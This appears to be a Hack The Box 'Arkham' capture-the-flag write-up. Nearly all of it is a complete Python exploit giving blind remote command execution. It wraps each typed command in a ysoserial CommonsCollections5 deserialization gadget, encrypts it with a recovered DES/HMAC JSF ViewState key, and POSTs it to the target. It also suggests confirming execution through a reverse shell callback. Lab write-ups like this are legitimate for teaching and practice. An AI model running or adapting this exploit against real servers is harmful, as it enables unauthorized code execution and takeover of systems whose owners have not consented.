[HTB] Arkham

Exploitation script (hardcoded) - Blind CMD

Below is a Python script which, given the IP of the Arkham box, gives you a blind command shell: each command is wrapped in a ysoserial CommonsCollections5 gadget chain, DES-encrypted and HMAC-tagged with the recovered ViewState key, and POSTed as `javax.faces.ViewState`. No command output is returned — only the HTTP status code — so confirm execution out-of-band (e.g. a ping or reverse shell callback).

import base64
import os
import subprocess
import time
from urllib.parse import quote, unquote

import pyDes
import requests
from Crypto.Hash import HMAC, SHA

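# Variables to set
url = "http://10.129.16.165:8080"
# ViewState encryption key recovered from the target (base64 of the raw DES key bytes).
encryption_key = bytes(base64.b64decode("SnNGOTg3Ni0="))
# Route every request through a local intercepting proxy (e.g. Burp on 8080);
# set to None to talk to the target directly.
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# Seconds to wait for the target before reporting a failed request.
request_timeout = 30

# Endpoint that consumes the ViewState. Built exactly once: appending it to `url`
# inside the loop meant every command after the first was POSTed to
# ".../userSubscribe.faces/userSubscribe.faces".
viewstate_url = url + "/userSubscribe.faces"

# Static form fields sent alongside the ViewState.
# NOTE(review): requests form-encodes these keys again, so "%3A" reaches the server
# as "%253A". The exploit does not depend on them -- only javax.faces.ViewState is
# deserialized -- but verify before relying on the email/submit fields for anything.
form_fields = {
    "j_id_jsp_1623871077_1%3Aemail": "defa@a.pl",
    "j_id_jsp_1623871077_1%3Asubmit": "SIGN+UP",
    "j_id_jsp_1623871077_1_SUBMIT": 1,
}


def generate_gadget_chain(cmd_input: str) -> bytes:
    """Return the serialized CommonsCollections5 gadget chain that executes ``cmd_input``.

    ysoserial is invoked with an argv list instead of ``os.system`` on a quoted shell
    string, so the command reaches ysoserial verbatim: a single quote or other shell
    metacharacter in ``cmd_input`` no longer breaks, or is interpreted by, the local
    shell. ysoserial's stderr stays attached to the terminal so build errors are visible.

    Raises:
        subprocess.CalledProcessError: if ysoserial exits non-zero.
        FileNotFoundError: if ``java`` is not on PATH.
    """
    argv = ["java", "-jar", "ysoserial-modified.jar", "CommonsCollections5", "cmd", cmd_input]
    completed = subprocess.run(argv, stdout=subprocess.PIPE, check=True)
    return completed.stdout


def encrypt_viewstate(payload: bytes) -> bytes:
    """Encode ``payload`` the way the target validates a ViewState.

    DES-ECB with PKCS#5 padding, then an HMAC over the ciphertext computed with the
    same key; the 20-byte tag is appended and the whole thing is base64-encoded for
    the form field.
    """
    cipher = pyDes.des(encryption_key, pyDes.ECB, padmode=pyDes.PAD_PKCS5)
    ciphertext = cipher.encrypt(payload)
    tag = HMAC.new(encryption_key, ciphertext, SHA).digest()
    return base64.b64encode(ciphertext + tag)


def main() -> None:
    """Read commands interactively and deliver each one as a malicious ViewState."""
    print("Type 'exit' to quit the program.")
    while True:
        cmd_input = input("shell (blind) >> ")
        if cmd_input == "exit":
            break
        if not cmd_input.strip():
            continue  # nothing to run; don't spin up the JVM for an empty command

        try:
            payload = generate_gadget_chain(cmd_input)
        except (subprocess.CalledProcessError, FileNotFoundError) as err:
            print(f"ysoserial failed ({err}); command not sent")
            continue

        data = {**form_fields, "javax.faces.ViewState": encrypt_viewstate(payload)}
        print(f"payload: {len(payload)} bytes -> POST {viewstate_url}")

        # verify=False only matters for an https target; harmless for plain http.
        try:
            response = requests.post(
                viewstate_url, data=data, verify=False, proxies=proxies, timeout=request_timeout
            )
            print(response.status_code)
        except requests.RequestException as err:
            # Surface the failure rather than swallowing it: a proxy that is not
            # running, or a target that is down, used to look identical to a
            # successfully delivered blind command.
            print(f"request failed: {err}")


if __name__ == "__main__":
    main()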
